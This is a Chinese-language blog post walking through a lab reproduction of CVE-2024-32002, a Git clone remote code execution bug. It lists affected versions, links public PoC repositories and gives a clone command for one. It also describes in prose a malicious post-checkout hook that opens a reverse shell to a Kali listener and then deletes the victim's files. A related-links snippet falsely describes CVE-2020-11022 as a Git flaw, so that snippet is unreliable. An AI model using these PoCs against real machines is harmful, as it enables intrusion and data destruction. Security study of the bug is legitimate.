Git CVE-2024-32002漏洞利用

已于 2024-05-22 19:25:03 修改
阅读量721 收藏 7
点赞数 6
文章标签: git
于 2024-05-22 18:51:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ldl345/article/details/139126972
版权

利用 CVE-2024-32002漏洞:通过 git clone 进行 RCE的操作

影响版本

Windows 和 MacOS 系统

git 2.45.0 

git 2.44.0 

git 2.43.* < 2.43.4 

git 2.42.* < 2.42.2 

git 2.41.0 

git 2.40.* < 2.40.2 

git < 2.39.4 

详细漏洞利用过程:

Exploiting CVE-2024-32002: RCE via git clone | Amal Murali

一、

poc来源:

GitHub - JJoosh/CVE-2024-32002-Reverse-Shell: Este script demuestra cómo explotar la vulnerabilidad CVE-2024-32002 para obtener una reverse shell, proporcionando acceso remoto al sistema afectado. Úselo con precaución en entornos controlados y solo con fines educativos o de pruebas de seguridad.

上面仓库的git版本应该是不小心写错了。我只验证git 2.44.0 的版本,2.44.1和2.45.1应该是修复了,各位验证还是下载低版本的git吧。

首先创建一个包含恶意 post-checkout 钩子的Git仓库,并通过子模块和符号链接将其嵌入到另一个Git仓库中。最终,当目标用户克隆并初始化这个仓库时,恶意钩子将被执行,并在目标机器上启动一个反向Shell连接。

这是一个受到污染的git仓库。



攻击者打开kali,在kali上建立监听。

执行前需要修改脚本中的ip和端口为主机kali主机的ip和nc监听的端口。

受害者在本地仓库上执行命令。运行名称是pocgitreveshell1.sh是因为尝试修改了其中的一些内容,原始版本改了个名留成备份,运行按自己的名字即可。

攻击者在kali上远程连接到受害者主机。

攻击者执行查看受害者文件内容的命令。

攻击者执行强制删除受害者文件内容的命令。

二、

poc来源

https://github.com/amalmurali47/git_rce 

直接打开git。运行就可以看到执行代码打开了计算器。

git clone --recursive git@github.com:amalmurali47/git_rce.git

三、

下面是chatgpt对--recursive的解释,这个漏洞的话,不加--recursive是不会触发的,因为核心就是要到子仓库拷贝恶意代码。

在使用 git clone 命令克隆仓库时,--recursive 参数的作用是决定是否同时克隆子模块。以下是详细的解释:

不加 --recursive 参数

当您使用 git clone 命令而不加 --recursive 参数时,Git 只会克隆主仓库,不会自动克隆任何子模块。子模块的目录会存在,但它们的内容不会被检出。

git clone <repository-url>

克隆完成后,可以手动初始化和更新子模块:

cd <repository-directory> git submodule init git submodule update

加 --recursive 参数

当您使用 git clone 命令并加上 --recursive 参数时,Git 不仅会克隆主仓库,还会递归地克隆所有子模块。这意味着子模块的内容会在克隆主仓库时一并检出。

git clone --recursive <repository-url>

这样做的好处是,您在克隆仓库后不需要手动初始化和更新子模块,所有子模块会自动被检出到正确的版本。

宵忍
关注
  • 6
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Git严重漏洞,远程执行代码,Mac和Windows通杀!
IT界那些事儿
05-27 8160
不得了了,家人们!就在这几天,Git爆出了一个严重漏洞,编号,一个可以远程执行代码的RCE漏洞!攻击者精心准备一个Git项目,只要你尝试去Clone它,你的电脑就能执行攻击代码沦陷。比如下面这个GitHub上面的项目:你可以执行一下下面的命令:不出意外的话,你的电脑将会弹出计算器程序:能让你弹计算器,就能执行其他更危险的操作,比如给你种木马等等。Git是我们程序员基本离不开的工具,这波漏洞操作,属实是对程序员定向打击了。接下来我们来理一理这个漏洞的工作原理是怎么样的。
各位用到git的,请注意CVE-2024-32002安全漏洞
云散的博客
05-30 1129
利用 CVE-2024-32002 漏洞:通过git clone进行RCE的操作新版本(2.45.1) 应该是被修复了新版2.45.1。
cve-2024-32002复现
kjdfklha的博客
06-01 489
cve-2024-32002复现
上周暗网0day售卖情报一览
HUANGXIN9898的博客
05-28 935
近日,奇安信CERT监测到官方修复Git 远程代码执行漏洞(CVE-2024-32002),由于Git在支持符号链接的不区分大小写的文件系统上的递归克隆容易受到大小写混淆的影响,未经身份认证的远程攻击者利用漏洞使受害者克隆操作期间执行刚刚克隆的代码,从而导致远程代码执行。Git 是一个跟踪文件版本的分布式版本控制系统。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
[240528] git 漏洞 CVE-2024-32002 | ChatGPT Plus vs API 成本比较
edwinjhlee的博客
05-28 657
- git 注入漏洞 | CVE-2024-32002 - ChatGPT Plus vs API: 成本比较
1day HCM智能人力资源系统DingDingConfigNew 存在信息泄露
最新发布
weixin_43167326的博客
07-02 641
HCM智能人力资源系统帮助大型企业解决跨地域、多层次集团发展过程中面临的人力资源管控、协调性、资源共享等问题,内置强大的工作流引擎驱动各大复杂的人力资源业务流程其实 并实现快速构建的业务模块而无须开发。结合大型企业对人才选、育、用、留的特点,本系统丰富并完善了招聘、培训、绩效、薪酬、能力素质等各项业务的管理。某HCM智能人力资源系统存在SQL注入漏洞,攻击者可通过漏洞获取系统权限。
CVE-2016-5195:CVE-2016-5195漏洞利用示例
05-10
dcow是漏洞CVE-2016-5195的可能利用。 在易受攻击的系统上以无特权的用户身份运行该程序,它将修改/ etc / passwd文件,并强制输入密码“ dirtyCowFun”(SHA-512,但可以针对较旧的标准进行修改)。 如果成功执行...
CVE-2019-18935:RCE漏洞用于ASP.NET AJAX的Telerik UI中的.NET JSON反序列化漏洞
05-25
该主教福克斯,包括此漏洞的完整的演练,并利用此问题的详细信息(带补丁的说明一起)。 入门 先决条件 您需要安装才能使用build-dll.bat编译混合模式.NET程序集DLL有效负载。 安装 git clone ...
GitHack-master.rar
01-06
5. **Git漏洞利用与防护**:可能包含了关于已知Git漏洞的信息,例如CVE-2021-21300,这是一个允许攻击者通过恶意的Git钩子脚本执行任意代码的漏洞。了解这些漏洞可以帮助我们增强仓库的安全性。 6. **Git forensics...
CVE-2015-4495:针对CVE-2015-4495 MFSA2015-78的漏洞利用
05-16
针对CVE-2015-4495 / MFSA2015-78的漏洞利用 如何使用 在parse_directory_listing函数中添加您的逻辑。 用法 $ git clone https://github.com/vincd/CVE-2015-4495.git $ cd CVE-2015-4495 $ python -m ...
CVE-2018-8120-Webshell下可用版本提权
07-16
攻击者可利用漏洞在内核模式下以提升的权限执行任意代码。 2 漏洞标识符 CVE ID: CVE-2018-8120 3 影响系统 受影响系统: Microsoft Windows 7 SP1 Windows Server 2008 SP2 Windows Server 2008 R2 SP1 ...
Git信息泄露原理解析及利用总结
热门推荐
wulanlin的博客
01-10 1万+
前言 最近,在和一些人聊天的过程中发现,好多人可以很从容淡定的说出信息收集需要收集Git信息泄露,至于深入的去谈这个漏洞产生的原理时,貌似不太直到这个问题以及相关工具的原理是什么?但作为小白的我始终觉得,对于一个问题只有深入的了解它的原理,并且利用的核心思想才能更好的挖掘和利用它。(可能思想有些“吹毛求疵”了,欢迎大佬们来指教) 那这篇文章,我就尝试从原理上分析一下这个漏洞以及漏洞利用思想吧!(当然,借鉴了很多前辈的文章,感谢前辈们的分享) 一、Git简介 官方给出的解释是:Git是一个开源的分布
漏洞挖掘】——59、Git信息泄露漏洞检测利用
Fly_鹏程万里
10-20 1164
Git是一个开源的分布式版本控制系统,在执行git init初始化目录的时候会在当前目录下自动创建一个.git目录,用来记录代码的变更记录等,发布代码的时候如果没有把.git这个目录删除直接发布到服务器上攻击者就可以通过它来恢复源代码。
git泄露漏洞总结
weixin_66839513的博客
04-02 2477
Git泄露是指在使用Git版本控制系统时,由于配置不当或者操作失误,导致敏感信息(如密码、密钥、源代码等)被意外地上传到公开的代码仓库或者其他公开可访问的地方,从而被未授权的人获取到。
实战中的.git信息泄露利用
G3et的博客
04-16 643
其实这个是非常简单的哈,但很多人看见.git不知道这个漏洞就放弃了.git文件夹是一种常见的源代码版本控制系统(如Git)使用的文件夹,用于跟踪文件和文件夹的更改。如果这个文件夹被泄露,那么你的代码和版本控制信息也会被泄露。
Sheila Teo分享GPT-4提示工程竞赛胜利经验,DynamiCrafter工具实现图转超逼真动态视频
一支烟一朵花
06-14 711
本文介绍了大模型训练、推理的基本逻辑,并以Transformer为例,分析了其特点和优势。来源:https://www.infoq.cn/article/c965120d46e5bc4d5d790d1a7运营大语言模型应用程序提出了一些在运营传统软件系统时熟悉的问题,但通常有新的变化来保持新鲜感。大语言模型应用程序还提出了全新的问题。我们将这些问题及其答案分为四部分:数据、模型、产品和团队。
.git文件夹信息泄露漏洞利用
ddchggf的博客
08-10 3834
未经授权请勿利用文章中的技术 资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果 和损失,均由使用者本人负责。无意中使用x-ray被动扫描,扫描出了一个git文件信息泄露。...
CTF之路:git项目本地版本库(.git文件夹)漏洞利用
zw05011的博客
01-08 2872
1.题目 BP监听数据包里有一个flag,base64试了一下,假的。 试试扫描后台目录,用御剑后台扫描珍藏版OK 题干提示用linux,kali linux平台有gobuster(但是扯淡的是2021版本里竟然没有安装) 扫描发现了.git目录,说明存在git本地版本库漏洞,flag就在这里。 2.知识点 git项目本地版本库漏洞利用 wget递归下载 3.解析 #安装gobuster sudo apt install gobuster ​ 使用gobuster对网站后台进行
请给出CVE-2020-11022的漏洞原理
05-11
CVE-2020-11022是Git中的一个漏洞,其原理为:在Git 2.17版本之前(包括2.17),如果一个恶意的仓库克隆了一个受害者仓库,并向受害者发送了一个Pull请求,那么在受害者执行`git pull`命令时,恶意仓库中的攻击者可以通过在Pull请求中添加特定的Git配置参数,来实现向受害者仓库中注入恶意的Git配置,并从而导致受害者仓库的Git配置被篡改。 具体来说,攻击者可以在Pull请求中添加一个名为“submodule.<name>.path”的配置参数,其中“<name>”是子模块的名称,而“path”则是一个可执行的shell脚本,攻击者可在其中编写任意的命令和代码。当受害者执行`git pull`命令时,Git会自动执行这个shell脚本,从而导致恶意代码的执行,从而实现攻击。 需要注意的是,这个漏洞只会影响到受害者执行`git pull`命令的过程,而对其他Git操作(如`git clone`、`git push`等)没有影响。此外,Git 2.17之后的版本已经修复了这个漏洞
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值